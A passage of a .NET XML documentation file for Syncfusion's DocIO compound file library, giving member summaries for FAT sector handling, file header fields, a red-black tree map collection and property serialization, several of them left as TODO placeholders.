        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.GetStream(System.IO.Stream,System.Int32,Syncfusion.CompoundFile.DocIO.Net.CompoundFile)">
            <summary>
            Gets data of the compound file substream.
            </summary>
            <param name="stream">Stream with compound file data.</param>
            <param name="firstSector">First sector of the stream to get.</param>
            <param name="file">Parent compound file object.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.NextSector(System.Int32)">
            <summary>
            Gets index of the next sector in the chain.
            </summary>
            <param name="sectorIndex">Index of the current sector in the chain.</param>
            <returns>Next sector in the chain.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.CloseChain(System.Int32)">
            <summary>
            Closes sectors chain by marking all those sectors as free starting from specified one.
            </summary>
            <param name="iSector"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.EnlargeChain(System.Int32,System.Int32)">
            <summary>
            Enlarges existing sectors chain.
            </summary>
            <param name="sector">Last sector in the chain that requires enlargment.</param>
            <param name="sectorCount">Number of sectors to add.</param>
            <returns>Index of the chain start (used when chain wasn't created before).</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.FreeSector(System.Int32)">
            <summary>
            Frees specified sector.
            </summary>
            <param name="sector">Sector to free.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.AllocateNewSectors(System.Int32@,System.Int32)">
            <summary>
            Allocates required number of new sectors.
            </summary>
            <param name="sector">Start sector index.</param>
            <param name="count">Number of sectors to allocate.</param>
            <returns>First sector in the new part of the chain.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.AllocateFreeSectors(System.Int32@,System.Int32)">
            <summary>
            Allocates required number of free sectors.
            </summary>
            <param name="sector">Start sector index (this value points to the last used sector after this operation).</param>
            <param name="count">Number of sectors to allocate.</param>
            <returns>First sector in the new part of the chain</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.Write(System.IO.Stream,Syncfusion.CompoundFile.DocIO.Net.DIF,Syncfusion.CompoundFile.DocIO.Net.FileHeader)">
            <summary>
            Saves fat data into stream.
            </summary>
            <param name="stream">Stream to write fat data into.</param>
            <param name="dif">DIF object to update after writing.</param>
            <param name="header">File header.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.AllocateFatSectors(System.Int32,Syncfusion.CompoundFile.DocIO.Net.DIF)">
            <summary>
            Allocates required number of fat sectors.
            </summary>
            <param name="fatSectorsCount">Number of sectors that must be allocated.</param>
            <param name="dif">DIF structure that contains info about fat sectors sequence.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.FillNextSector(System.Int32,System.Byte[])">
            <summary>
            Fills single fat sector.
            </summary>
            <param name="fatItemToStart">Index in the fat to start writing from.</param>
            <param name="arrSector">Sector to fill.</param>
            <returns>First item that wasn't saved inside sector.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.AllocateSector(System.Int32)">
            <summary>
            Allocates new sector of the specified sector type.
            </summary>
            <param name="sectorType">Sector type to allocate.</param>
            <returns>Allocated sector index.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.AddSector">
            <summary>
            Adds single sector to the stream.
            </summary>
            <returns>Index of the added sector.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.WriteSimple(System.IO.MemoryStream,System.Int32)">
            <summary>
            Writes fat data directly into a stream.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <param name="sectorSize">Size of the sector to use for writing.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.GetSectorOffset(System.Int32)">
            <summary>
            Evaluates sector offset.
            </summary>
            <param name="sectorIndex">Zero-based sector index to evaluate offset for.</param>
            <returns>Offset to the sector start.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FAT.GetChainLength(System.Int32)">
            <summary>
            Evaluates number of sectors in the sector chain starting from the specified sector.
            </summary>
            <param name="firstSector">Starting sector of the entry to enumerate.</param>
            <returns>Number of sectros in the sector chain.</returns>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FAT.SectorSize">
            <summary>
            Sector size.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.FileHeader">
            <summary>
            This class represents compound file header.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.HeaderSize">
            <summary>
            Size of the header.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.SignatureSize">
            <summary>
            Signature size.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.DefaultSignature">
            <summary>
            Default (and the only supported) signature.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_arrSignature">
            <summary>
            File signature.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_classId">
            <summary>
            Class id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_usMinorVersion">
            <summary>
            Minor version of the format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_usDllVersion">
            <summary>
            Major version of the dll/format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_usByteOrder">
            <summary>
            Byte order, 0xFFFE for Intel byte-ordering.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_usSectorShift">
            <summary>
            Size of sectors in power-of-two (typically 9).
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_usMiniSectorShift">
            <summary>
            Size of mini-sectors in power-of-two (typically 6).
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_usReserved">
            <summary>
            Reserved, must be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_uiReserved1">
            <summary>
            Reserved, must be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_uiReserved2">
            <summary>
            Reserved, must be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iFatSectorsNumber">
            <summary>
            Number of sectors in the FAT chain.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iDirectorySectorStart">
            <summary>
            First sector in the directory chain.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iSignature">
            <summary>
            Signature used for transactioning, must be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_uiMiniSectorCutoff">
            <summary>
            Maximum size for mini-streams. Typically 4096 bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iMiniFastStart">
            <summary>
            First sector in the mini-FAT chain.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iMiniFatNumber">
            <summary>
            Number of sectors in the mini-FAT chain.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iDifStart">
            <summary>
            First sector in the DIF chain.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_iDifNumber">
            <summary>
            Number of sectors in the DIF chain.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.FileHeader.m_arrFatStart">
            <summary>
            First 109 fat sectors.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the file header and extracts data from the stream.
            </summary>
            <param name="stream">Stream to extract header data from.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.Serialize(System.IO.Stream)">
            <summary>
            Saves header into specified stream.
            </summary>
            <param name="stream">Stream to write header into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.CheckSignature(System.IO.Stream)">
            <summary>
            Checks whether starting bytes of the stream are the same as signature of the compound file.
            </summary>
            <param name="stream">Stream to check.</param>
            <returns>True if stream contains required signature.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.CheckSignature">
            <summary>
            Checks whether signature is supported.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.CheckSignature(System.Byte[])">
            <summary>
            Checks whether signature is supported.
            </summary>
            <param name="arrSignature">Data to compare with default signature.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.WriteUInt16(System.Byte[],System.Int32,System.UInt16)">
            <summary>
            
            </summary>
            <param name="buffer"></param>
            <param name="offset"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.WriteUInt32(System.Byte[],System.Int32,System.UInt32)">
            <summary>
            
            </summary>
            <param name="buffer"></param>
            <param name="offset"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.FileHeader.WriteInt32(System.Byte[],System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="buffer"></param>
            <param name="offset"></param>
            <param name="value"></param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.SectorSize">
            <summary>
            Size of the sector. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.MinorVersion">
            <summary>
            Minor version of the format.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.DllVersion">
            <summary>
            Major version of the dll/format.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.ByteOrder">
            <summary>
            Byte order, 0xFFFE for Intel byte-ordering.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.SectorShift">
            <summary>
            Size of sectors in power-of-two (typically 9).
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.MiniSectorShift">
            <summary>
            Size of mini-sectors in power-of-two (typically 6).
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.Reserved">
            <summary>
            Reserved, must be zero.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.Reserved1">
            <summary>
            Reserved, must be zero.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.Reserved2">
            <summary>
            Reserved, must be zero.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.FatSectorsNumber">
            <summary>
            Number of sectors in the FAT chain.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.DirectorySectorStart">
            <summary>
            First sector in the directory chain.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.Signature">
            <summary>
            Signature used for transactioning, must be zero.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.MiniSectorCutoff">
            <summary>
            Maximum size for mini-streams. Typically 4096 bytes.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.MiniFastStart">
            <summary>
            First sector in the mini-FAT chain.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.MiniFatNumber">
            <summary>
            Number of sectors in the mini-FAT chain.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.DifStart">
            <summary>
            First sector in the DIF chain.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.DifNumber">
            <summary>
            Number of sectors in the DIF chain.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.FileHeader.FatStart">
            <summary>
            First 109 fat sectors.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.ItemNamesComparer">
            <summary>
            This comparer is used to compare item names inside storage.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.ItemNamesComparer.Compare(System.Object,System.Object)">
            <summary>
            Compares two objects and returns a value indicating whether one is less
            than, equal to, or greater than the other.
            </summary>
            <param name="x">The first object to compare.</param>
            <param name="y">The second object to compare.</param>
            <returns>
            Less than zero if x is less than y. 
            Zero if x equals y. 
            Greater than zero if x is greater than y. 
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.ItemNamesComparer.Compare(System.String,System.String)">
            <summary>
            Compares two objects and returns a value indicating whether one is less
            than, equal to, or greater than the other.
            </summary>
            <param name="x">The first object to compare.</param>
            <param name="y">The second object to compare.</param>
            <returns>
            Less than zero if x is less than y. 
            Zero if x equals y. 
            Greater than zero if x is greater than y. 
            </returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.NodeColor">
            <summary>
            Suitable Node colors used for 2-3-4 nodes detection.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.NodeColor.Red">
            <summary>
            Red color of node.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.NodeColor.Black">
            <summary>
            Black color of node.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode">
            <summary>
            Node class used for proper storing of data in the Map Collection.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_left">
            <summary>
            Reference on left branch.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_right">
            <summary>
            Reference on right branch.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_parent">
            <summary>
            Reference on parent branch.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_color">
            <summary>
            Color of node branch.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_bIsNil">
            <summary>
            Is current node Nil element or not?
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_key">
            <summary>
            Key part of stored in node data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.m_value">
            <summary>
            Value part of stored in node data.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.#ctor(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,System.Object,System.Object)">
            <summary>
            Create red colored Tree node.
            </summary>
            <param name="left">Reference on left branch.</param>
            <param name="parent">Reference on parent branch.</param>
            <param name="right">Refernce on right branch.</param>
            <param name="key">Key value of node.</param>
            <param name="value">Value part of node.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.#ctor(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,System.Object,System.Object,Syncfusion.CompoundFile.DocIO.Net.NodeColor)">
            <summary>
            Main constructor of class.
            </summary>
            <param name="left">Reference on left branch.</param>
            <param name="parent">Reference on parent branch.</param>
            <param name="right">Refernce on right branch.</param>
            <param name="key">Key value of node.</param>
            <param name="value">Value part of node.</param>
            <param name="color">Color of node.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.Left">
            <summary>
            Reference on left branch.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.Right">
            <summary>
            Reference on right branch.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.Parent">
            <summary>
            Reference on parent branch.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.Color">
            <summary>
            Color of node branch.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.IsNil">
            <summary>
            Is current node Nil element or not?
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.Key">
            <summary>
            Key part of stored in node data.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.Value">
            <summary>
            Value part of stored in node data.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.IsRed">
            <summary>
            Is current node set to red color?
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.RBTreeNode.IsBlack">
            <summary>
            Is current node set to black color?
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.MapCollection">
            <summary></summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.MapCollection.m_MyHead">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.MapCollection.m_size">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.MapCollection.m_comparer">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.#ctor">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.#ctor(System.Collections.IComparer)">
            <summary>
            Create collection with specified comparer for Key values.
            </summary>
            <param name="comparer">Comparer for key values.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Initialize">
            <summary>
            Create Empty node for collection.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Clear">
            <summary>
            Clear collection.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Add(System.Object,System.Object)">
            <summary>
            Add item into collection.
            </summary>
            <param name="key">Key part.</param>
            <param name="value">Value.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Contains(System.Object)">
            <summary>
            Check whether collection contains specified key.
            </summary>
            <returns>True if node with specified key is found; otherwise False.</returns>
            <param name="key">Key for check.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Remove(System.Object)">
            <summary>
            Remove from collection item with specified key.
            </summary>
            <param name="key">Key to identify item.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.begin">
            <summary>
            TODO: place correct comment here
            </summary>
            <returns>
            TODO: place correct comment here
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Min(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Get minimum value for specified branch.
            </summary>
            <param name="node">Branch start node.</param>
            <returns>Reference on minimum value node.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Max(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Get maximum value for specified branch.
            </summary>
            <param name="node">Branch start node.</param>
            <returns>Reference on maximum value node.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Inc(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Go to to next item in collection.
            </summary>
            <param name="node">Start node.</param>
            <returns>Reference on next item in collection or this.Empty if nothing found.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Dec(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Get previous item from collection.
            </summary>
            <param name="node">Start node.</param>
            <returns>Rererence on previous item in collection.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.LBound(System.Object)">
            <summary>
            Find node in collection by key value (search in lower side).
            </summary>
            <param name="key">Key of node to find.</param>
            <returns>Reference on found node, otherwise this.Empty value.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.UBound(System.Object)">
            <summary>
            Find node in collection by key value (search in upper side).
            </summary>
            <param name="key">Key of node to find.</param>
            <returns>Reference on found node, otherwise this.Empty value.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.LRotate(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Rotate branch into left side.
            </summary>
            <param name="_where">Branch start node.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.RRotate(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Rotate branch into right side.
            </summary>
            <param name="_where">Branch start node.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Erase(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            Erase node from collection.
            </summary>
            <param name="_root">Item to erase.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Insert(System.Boolean,Syncfusion.CompoundFile.DocIO.Net.RBTreeNode,System.Object,System.Object)">
            <summary>
            Insert item into collection.
            </summary>
            <param name="_addLeft">Add into left side of tree or right.</param>
            <param name="_where">Node for placement.</param>
            <param name="key">Key part of node.</param>
            <param name="value">Value part of node.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapCollection.GetEnumerator">
            <summary>
            Returns enumerator.
            </summary>
            <returns>Returns enumerator of current interface.</returns>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Empty">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Count">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.MapCollection.Item(System.Object)">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.m_current">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.m_parent">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.#ctor(Syncfusion.CompoundFile.DocIO.Net.RBTreeNode)">
            <summary>
            TODO: place correct comment here
            </summary>
            <param name="parent"/>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.Reset">
            <summary></summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.MoveNext">
            <summary></summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.System#Collections#IEnumerator#Current">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.MapEnumerator.Current">
            <summary>
            TODO: place correct comment here
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.PropertyData.LinkBit">
            <summary>
            Bit mask for LinkToContent property of the DocumentProperty class. 
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.#ctor">
            <summary>
            Initializes new isntance of the PropertyData.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.#ctor(System.Int32)">
            <summary>
            Initializes new instance of the property data.
            </summary>
            <param name="id">Id for the new property..</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.Parse(System.IO.Stream,System.Int32)">
            <summary>
            Extracts property data from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.Parse(System.IO.Stream,System.Int32,System.Int32)">
            <summary>
            Extracts property data from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.IsValidProperty">
            <summary>
            Determines whether [is valid property].
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.ParseVector(System.IO.Stream,System.Int32)">
            <summary>
            Extracts vector data from the stream.
            </summary>
            <param name="stream"></param>
            <param name="roundedSize"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.ParseVector(System.IO.Stream,System.Int32,System.Int32)">
            <summary>
            Extracts vector data from the stream.
            </summary>
            <param name="stream"></param>
            <param name="roundedSize"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.CreateArray(Syncfusion.CompoundFile.DocIO.PropertyType,System.Int32)">
            <summary>
            Creates array of the specified type.
            </summary>
            <param name="itemType">Item type.</param>
            <param name="count">Number of elements in the array.</param>
            <returns>Created array object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.ParseSingleValue(Syncfusion.CompoundFile.DocIO.PropertyType,System.IO.Stream,System.Int32)">
            <summary>
            Extracts single value from the stream.
            </summary>
            <param name="itemType"></param>
            <param name="stream"></param>
            <param name="roundedSize"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.ParseSingleValue(Syncfusion.CompoundFile.DocIO.PropertyType,System.IO.Stream,System.Int32,System.Int32)">
            <summary>
            Extracts single value from the stream.
            </summary>
            <param name="itemType"></param>
            <param name="stream"></param>
            <param name="roundedSize"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.GetDateTime(System.IO.Stream,System.Byte[])">
            <summary>
            Gets DateTime object data from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Buffer used to extract blob parts.</param>
            <returns>Extracted DateTime data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.GetBlob(System.IO.Stream,System.Byte[])">
            <summary>
            Gets blob data from the stream.
            </summary>
            <param name="stream">Stream to get blob data from.</param>
            <param name="buffer">Buffer used to extract blob parts.</param>
            <returns>Blob data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.GetClipboardData(System.IO.Stream,System.Byte[])">
            <summary>
            Gets clipboard data from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Buffer that can be used to extract clipboard data parts.</param>
            <returns>Clipboard data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.GetObject(System.IO.Stream,System.Int32)">
            <summary>
            Gets object value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="roundedSize">Maximum size of the data to extract.</param>
            <returns>Extracted object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.GetObject(System.IO.Stream,System.Int32,System.Int32)">
            <summary>
            Gets object value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="roundedSize">Maximum size of the data to extract.</param>
            <returns>Extracted object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.WriteObject(System.IO.Stream,System.Object)">
            <summary>
            Writes object into the stream.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <param name="value">Object to write.</param>
            <returns>Size of the written data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.Serialize(System.IO.Stream)">
            <summary>
            Writes property data into the stream.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <returns>Number of written bytes.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.SerializeDictionary(System.IO.Stream,System.Collections.Generic.Dictionary{System.Int32,System.String})">
            <summary>
            Serializes names dictionary.
            </summary>
            <param name="stream">Stream to serialize into.</param>
            <param name="dictionary">Dictionary to serialize.</param>
            <returns>Size of the serialized data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.SerializeVector(System.IO.Stream,System.Collections.IList)">
            <summary>
            Serializes vector data.
            </summary>
            <param name="stream"></param>
            <param name="data"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.SerializeSingleValue(System.IO.Stream,System.Object,Syncfusion.CompoundFile.DocIO.PropertyType)">
            <summary>
            Serializes single value into the stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
            <param name="value">Value to serialize.</param>
            <param name="valueType">Value type.</param>
            <returns>Size of the written data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.PropertyData.SerializeBlob(System.IO.Stream,System.Byte[])">
            <summary>
            Serializes blob data.
            </summary>
            <param name="stream">Stream to write blob into.</param>
            <param name="value">Blob value to write.</param>
            <returns>Size of the written data.</returns>
        </member>
